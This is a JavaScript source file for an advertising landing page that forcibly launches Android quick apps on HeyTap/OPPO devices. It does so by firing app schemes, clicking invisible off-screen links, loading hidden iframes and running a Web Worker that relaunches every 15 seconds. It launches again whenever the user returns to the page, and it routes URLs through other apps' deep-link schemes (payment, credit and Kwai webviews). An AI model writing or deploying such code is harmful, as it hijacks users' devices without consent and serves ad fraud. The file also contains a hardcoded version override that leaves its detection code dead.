/**
 * newland.js —— 原生 JS 快应用拉起脚本（oaps 落地页专用）
 *
 * 设计要点：
 *  - 当前已是 oaps 页面，不再跳转任何 h5 / 二次落地页，只负责拉起快应用。
 *  - 拉起协议（scheme）与 pushQuickApp 主循环参考 land.js；去掉 land.js 的拉起控制逻辑
 *    （getLinkData / apiTimeOut / 拉停 / 上报 / h5 参数 等），只保留「协议 + 循环 + a 注入」。
 *  - 协议按安卓版本（UA 中 Android 主版本号）分支：
 *      ≤ 12         : 全部走  oaps://instant/app/...
 *      >12 且 < 15   : 全部走  heytapbrowser://com.heytap.browser.search/web?url=...
 *      ≥ 15         : 一次 oaps://instant/app/ + 一次 heytapbrowser://...（两个一块拉起）
 *  - 拉起次数 = 后端返回的 hapurl 列表个数（列表 5 个就拉 5 次，每次轮换一个 hapurl）。
 *  - a 标签注入：保证用户切到其它应用（如游戏中心）时也能触发 scheme 拉起。
 *  - 后端接口与参数完全沿用 oaps.js（POST /api/quickApp/hapurls）。
 */

let baseUrl = "https://toufang.mwadmore.cn";

// ============ 状态 ============
let hapUrlList = []; // 后端返回的完整 hap:// 字符串数组，直接使用
let numRef = 0; // 当前 hapurl 轮播索引
let androidVer = 0; // 解析出的安卓主版本号
let pullIndex = 0; // pushQuickApp 当前拉起计数
let pullModeList = []; // 拉起模式列表（由安卓版本决定内容）
let hidden = false;
let pullTimeout = null;
let worker = null;
let pageName = "newland"; // 落地页标识（urStr 埋点用，可改为具体页面名）

// ============ oaps.js 参数构造 ============
function getUrlParams() {
  const urlParams = new URLSearchParams(window.location.search);
  const params = {
    credentialId: urlParams.get("quickKey") || "",
    packageName: urlParams.get("quickAppName"),
    hm: urlParams.get("hm") || urlParams.get("channel"),
    channel: urlParams.get("channel"),
  };
  if (params.channel == "AIQIYI") {
    params.impressId = urlParams.get("impress_id");
  }
  return params;
}

function getSearchParams() {
  return new URLSearchParams(window.location.search);
}

function getParam(searchParams, key) {
  let val = searchParams.get(key);
  if (val === null || val === undefined || val === "null") {
    return "";
  }
  return encodeURIComponent(val);
}

// 拼接 innerUrl（oaps.js 规则：hapurl + oapslinkEnabled=1 + tid/sourceType/impressId/pageId/lbid）
function buildInnerUrl() {
  if (hapUrlList.length === 0) return "";
  const searchParams = getSearchParams();
  searchParams.set("sid", "");
  searchParams.set("webScene", "oaps_show");
  const hapurl = hapUrlList[numRef % hapUrlList.length];
  return `${hapurl}&oapslinkEnabled=1&tid=${getParam(
    searchParams,
    "tid",
  )}&sourceType=${getParam(searchParams, "sourceType")}&impressId=${getParam(
    searchParams,
    "impressId",
  )}&pageId=${getParam(searchParams, "pageId")}&lbid=${getParam(
    searchParams,
    "lbid",
  )}`;
}

// ============ 安卓版本解析 ============
function getAndroidVersion() {
     return 13;
  const ua = navigator.userAgent || "";
  const m = ua.match(/Android\s([\d.]+)/i);
  if (m && m[1]) {
    return parseInt(m[1].split(".")[0], 10) || 0;
  }
  return 15; // 非安卓 / 解析失败：默认走 oaps
}

// ============ 协议构造 ============
// oaps://instant/app/ 即时快应用：将 hap:// 直接替换为 oaps://instant/
function makeOapsInstantUrl(innerUrl) {
  return innerUrl.replace(/^hap:\/\//, "oaps://instant/");
}

// heytapbrowser 浏览器拉起
function makeHeytapUrl(innerUrl) {
  return (
    "heytapbrowser://com.heytap.browser.search/web?url=" +
    encodeURIComponent(innerUrl)
  );
}

// 其他协议保留（oaps.js 原 5 种 scheme），用于 a 标签注入兜底，提高拉起成功率
function makeSchemeUrl(index, innerUrl) {
  const enc = encodeURIComponent(innerUrl);
  switch (index) {
    case 0:
      return (
        "opluspay://com.heytap.cloud/webcontainer?country=CN&webUrl=" + enc
      );
    case 1:
      return "uccredit://com.credit.speechassist/creditMarket?url=" + enc;
    case 2:
      return "kwai://webview?url=" + enc;
    case 3:
      return "gs://search/gsearch?m=5&t=searc&type=4&u=" + enc;
    default:
      return "heytapbrowser://com.heytap.browser.search/web?url=" + enc;
  }
}

// ============ a 标签注入（保证切到其他 app 也能拉起） ============
function injectALink(url) {
  if (!url) return;
  const a = document.createElement("a");
  a.href = url;
  a.setAttribute(
    "style",
    "position:absolute;left:-100px;top:-100px;height:1px;width:1px;opacity:0;",
  );
  document.body.appendChild(a);
  a.click();
}

// ============ 单次拉起（按安卓版本选择协议） ============
function launchOnce() {
  if (hapUrlList.length === 0) return;
  const innerUrl = buildInnerUrl();
  const oapsUrl = makeOapsInstantUrl(innerUrl);
  const heytapUrl = makeHeytapUrl(innerUrl);

  if (androidVer >= 15) {
    // 两个一块拉起：一次 oaps + 一次 heytap
    window.location.href = oapsUrl;
    injectALink(innerUrl);
    // 其他协议 a 注入兜底
    injectALink(heytapUrl);
  } else if (androidVer > 12) {
    // 13 / 14
    window.location.href = heytapUrl;
    injectALink(innerUrl);
  } else {
    // ≤ 12（含非安卓默认）
    window.location.href = oapsUrl;
    injectALink(innerUrl);
  }

  numRef++; // 轮换下一个 hapurl

//   hapJumpH5(); // 每次单次拉起都附带一次 H5 落地页拉起
}

// ============ 隐藏 iframe 静默拉起（沿用 land.js 的 hapJump） ============
function hapJump(jumpUrl) {
  console.log("iframeJump");
  var e = document.createElement("iframe");
  e.width = "1";
  e.height = "1";
  e.style =
    "margin: 0px; padding: 0px; background: transparent none repeat scroll 0% 0%; border: medium none; display: none; position: fixed; left: 0px; bottom: 0px; height: 1px; width: 1px;";
  e.src = jumpUrl;
  document.body.appendChild(e);
}

// launch_key 生成（urStr 用）
function genLaunchKey() {
  return (Math.random() + "").slice(2, 5);
}

// 埋点参数（对齐 land.js 的 urStr）
function urStr() {
  const launch_key = genLaunchKey();
  const timeStamp = Math.floor(Date.now() / 1000);
  const visit = document.visibilityState === "visible" ? 1 : 0;
  return (
    "&ld_page_name=" +
    pageName +
    "&launch_key=" +
    launch_key +
    "&pushTimeStamp=" +
    timeStamp +
    "&visit=" +
    visit
  );
}

// 通过 oaps://mk/web 拉起 H5 落地页（toufang.mwadmore.cn + 当前页 query 透传）
// 并附带 land.js 的 makeHapUrl(jumpType/triggerType) 与 urStr 埋点参数
function hapJumpH5() {
  const targetUrl = baseUrl + window.location.search; // 透传投放页自身参数
  // makeHapUrl 风格参数（iframe 的 h5 拉起对应 jumpType=h5iframe，默认 autoclick）
  const makeHapParams = "&jumpType=h5iframe&triggerType=autoclick";
  const finalUrl = targetUrl + makeHapParams + urStr();
  const url = "oaps://mk/web?u=" + encodeURIComponent(finalUrl);
  hapJump(url);
}

// ============ land.js 风格：主循环（次数 = 列表个数，拉完即停） ============
function pushQuickApp() {
  if (hapUrlList.length === 0) return;
  if (pullIndex >= hapUrlList.length) {
    // 已拉完列表中的所有 hapurl，主循环停止（不再重置）
    hidden = false;
    return;
  }
  hidden = true;
  launchOnce();
  pullTimeout = setTimeout(() => {
    pullIndex++;
    pushQuickApp();
  }, 15000);
}

// ============ land.js 风格：Worker 定时拉起 ============
function initWorker() {
  if (worker && worker.terminate) {
    worker.terminate();
  }
  const workerCode = `
    let timer = null;
    self.onmessage = ({ data }) => {
      if (!timer) {
        timer = setInterval(() => {
          self.postMessage(data);
        }, 15000);
      }
    };
  `;
  try {
    const blob = new Blob([workerCode], { type: "application/javascript" });
    const url = URL.createObjectURL(blob);
    worker = new Worker(url);
    let workerPullCount = 1; // Worker 自身拉起计数
    worker.onmessage = () => {
      if (workerPullCount >= hapUrlList.length) {
        // 已拉完列表中的所有 hapurl，停止 Worker（拉起次数 = 后端返回个数）
        hidden = false;
        worker.terminate();
        return;
      }
      launchOnce();
      workerPullCount++;
    };
    worker.onerror = (error) => {
      console.error("Worker error:", error);
      worker.terminate();
      URL.revokeObjectURL(url);
    };
    worker.postMessage("hello");
    window.addEventListener(
      "unload",
      () => {
        worker.terminate();
        URL.revokeObjectURL(url);
      },
      { once: true },
    );
  } catch (error) {
    console.error("Failed to initialize Worker:", error);
  }
}

// ============ land.js 风格：页面可见性重试 ============
function pageListener(cb) {
  document.addEventListener("visibilitychange", function () {
    if (document.visibilityState === "hidden") {
      cb(true);
    } else if (document.visibilityState === "visible") {
      cb(false);
    }
  });
}

// ============ 主流程 ============
function newland() {
  // 1. 解析安卓版本（决定协议分支）
  androidVer = getAndroidVersion();

  // 2. 请求 hapurls（oaps.js 接口），拿完整 hap:// 列表
  fetchHapUrls().then(startLaunch);
}

// 接口返回后（或兜底超时后）真正开始拉起
function startLaunch() {
  if (hapUrlList.length === 0) {
    console.warn("hapUrlList 为空，未拉起");
    return;
  }

  launchOnce(); // 首次拉起
  initWorker(); // Worker 定时拉起

  // 页面返回时再次拉起
  pageListener((e) => {
    if (!e) {
      numRef++;
      launchOnce();
    } else {
      hidden = false;
      if (pullTimeout) clearTimeout(pullTimeout);
    }
  });

  // 主循环：拉起次数 = 列表个数
//   pushQuickApp();
}

export { newland };

// ============ 后端请求（沿用 oaps.js 的 hapurls 接口） ============
function fetchHapUrls() {
  return new Promise((resolve) => {
    const params = getUrlParams();
    fetch(baseUrl + "/api/quickApp/hapurls", {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify(params),
    })
      .then((response) => {
        if (response.status === 200) {
          return response.json().then((data) => {
            hapUrlList = data?.data || [];
          });
        } else {
          throw new Error(`HTTP错误: ${response.status}`);
        }
      })
      .catch((err) => {
        console.error("fetchHapUrls error", err);
      })
      .finally(() => resolve());
  });
}

//# sourceURL=webpack://land_page/./js/newland.js?
